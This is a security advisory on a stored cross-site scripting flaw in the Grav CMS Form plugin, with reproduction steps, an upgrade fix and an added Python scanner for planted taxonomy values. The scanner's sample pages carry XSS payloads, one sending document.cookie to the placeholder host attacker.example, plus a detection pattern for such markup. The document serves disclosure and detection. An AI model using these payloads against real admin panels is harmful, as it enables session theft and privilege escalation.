Grav CMS Form Plugin Stored Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting vulnerability exists in the Grav CMS Form plugin, in the select field template, and affects Form plugin versions prior to 9.1.0. Taxonomy tag and category values are rendered in the admin panel through the Twig |raw filter, which bypasses Twig's global autoescaping, so the stored values reach the page as unescaped HTML. An editor-level user can therefore store a taxonomy value containing arbitrary JavaScript, and that script executes in the browser session of any administrator who views or edits a page in the admin panel. The issue is cross-page: a malicious taxonomy value stored on one page is rendered whenever an administrator views or edits any page, so a single value can affect the entire admin panel.

Impact

Exploitation gives an editor-level user JavaScript execution inside an administrator's authenticated admin-panel session. Because the script runs with the administrator's cookies and privileges, the attacker can perform admin-panel actions as that administrator, which is a privilege escalation from editor to administrator.

Reproduction

To reproduce, log in as an editor-level user and create or edit a page whose taxonomy tag or category value contains a JavaScript payload (for example, an HTML element with an inline event handler). Then, as an administrator, view or edit any page in the admin panel: the stored payload is rendered unescaped and executes.

Remediation

Update the Grav Form plugin to version 9.1.0 or later and Grav CMS to version 2.0.0-beta.2 or later. Updating corrects the rendering; taxonomy values that an editor has already stored remain in the page content and should be reviewed, since their presence indicates an exploitation attempt.
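Updating removes the rendering sink but does not remove taxonomy values an editor may already have planted. The script below is an added example, not part of this advisory or of Grav's own code: it hunts for such values in Grav page sources by pulling the taxonomy block out of each page's YAML frontmatter with a small standard-library parser and flagging tag or category values that contain markup. The sample pages, their paths, and the host attacker.example are constructed for the example; pointing the script at a real user/pages directory scans the live site.

```python
"""Hunt for markup stored in Grav page taxonomy values (added example)."""
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed sample pages for an offline run; not taken from any real site.
# The host attacker.example is a placeholder, not a real indicator.
SAMPLE_PAGES: Dict[str, str] = {
    "user/pages/01-blog/welcome/item.md": """---
title: Welcome
taxonomy:
    category: [blog]
    tag: [news, grav]
---
# Welcome
""",
    "user/pages/01-blog/evil/item.md": """---
title: Looks harmless
taxonomy:
    category: [blog]
    tag:
        - news
        - "<img src=x onerror=alert(document.cookie)>"
---
Body text.
""",
    "user/pages/02-about/default.md": """---
title: About
taxonomy:
    tag: ['<svg/onload=fetch("https://attacker.example/"+document.cookie)>']
---
""",
}

FRONTMATTER_RE = re.compile(r"\A---[ \t]*\n(.*?)\n---", re.S)
KEY_RE = re.compile(r"^([\w-]+):\s*(.*)$")
# A tag opener, an inline event handler, or a javascript: URL has no business
# in a plain taxonomy term.
SUSPICIOUS_RE = re.compile(r"<\s*[a-z/!]|\bon[a-z]+\s*=|javascript\s*:", re.I)
Finding = Tuple[str, str, str]  # (page path, taxonomy key, offending value)


def unquote(value: str) -> str:
    """Strip one layer of matching YAML quotes; enough for taxonomy terms."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value


def split_flow_list(body: str) -> List[str]:
    """Split the inside of a YAML flow list, e.g. a, "b, c", d, on unquoted commas."""
    items: List[str] = []
    buf: List[str] = []
    quote = None
    for ch in body:
        if quote:                      # inside quotes: only the matching quote ends it
            if ch == quote:
                quote = None
            else:
                buf.append(ch)
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ",":
            items.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    tail = "".join(buf).strip()
    if tail:
        items.append(tail)
    return items


def parse_taxonomy(frontmatter: str) -> Dict[str, List[str]]:
    """Return {taxonomy key: [values]} from the frontmatter's taxonomy: block.

    Handles the forms Grav pages normally use: key: [a, b] flow lists,
    key: followed by indented - item lines, and key: scalar.
    """
    lines = frontmatter.splitlines()
    result: Dict[str, List[str]] = {}
    i = 0
    while i < len(lines) and not re.match(r"^\s*taxonomy:\s*$", lines[i]):
        i += 1
    if i == len(lines):
        return result
    base = len(lines[i]) - len(lines[i].lstrip())
    current_key = None
    for line in lines[i + 1:]:
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent <= base:             # back at the taxonomy key's level: block over
            break
        stripped = line.strip()
        if stripped.startswith("- ") and current_key is not None:
            result[current_key].append(unquote(stripped[2:]))
            continue
        km = KEY_RE.match(stripped)
        if not km:
            continue
        current_key, rest = km.group(1), km.group(2).strip()
        values = result.setdefault(current_key, [])
        if rest.startswith("[") and rest.endswith("]"):
            values.extend(split_flow_list(rest[1:-1]))
        elif rest:
            values.append(unquote(rest))
    return result


def scan_pages(pages: Dict[str, str]) -> List[Finding]:
    """Flag taxonomy values containing markup across a {path: source} mapping."""
    findings: List[Finding] = []
    for path, source in pages.items():
        m = FRONTMATTER_RE.match(source)
        if not m:
            continue
        for key, values in parse_taxonomy(m.group(1)).items():
            findings.extend((path, key, v) for v in values if SUSPICIOUS_RE.search(v))
    return findings


def scan_directory(root: str) -> List[Finding]:
    """Scan every Markdown page under a Grav user/pages directory."""
    pages = {str(p): p.read_text(encoding="utf-8", errors="replace")
             for p in sorted(Path(root).rglob("*.md"))}
    return scan_pages(pages)


if __name__ == "__main__":
    hits = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_pages(SAMPLE_PAGES)
    for page_path, tax_key, bad_value in hits:
        print(f"{page_path}: taxonomy.{tax_key} = {bad_value!r}")
    sys.exit(1 if hits else 0)
```

Run it as `python scan_taxonomy.py user/pages` on the site; a non-zero exit means at least one taxonomy value carries markup and the page's edit history and the editor account that wrote it deserve a look. The parser is deliberately narrow (flow lists, block lists, scalars under taxonomy:), so a page using unusual YAML constructs should be checked by hand rather than assumed clean.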

Added: May 11, 2026, 5:27 PM
Updated: May 11, 2026, 5:27 PM

Vulnerability Rating

Custom Algorithm

spread: 5.2
impact: 5.4
exploitability: 6.2
remediation: 7.7
relevance: 8.0
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.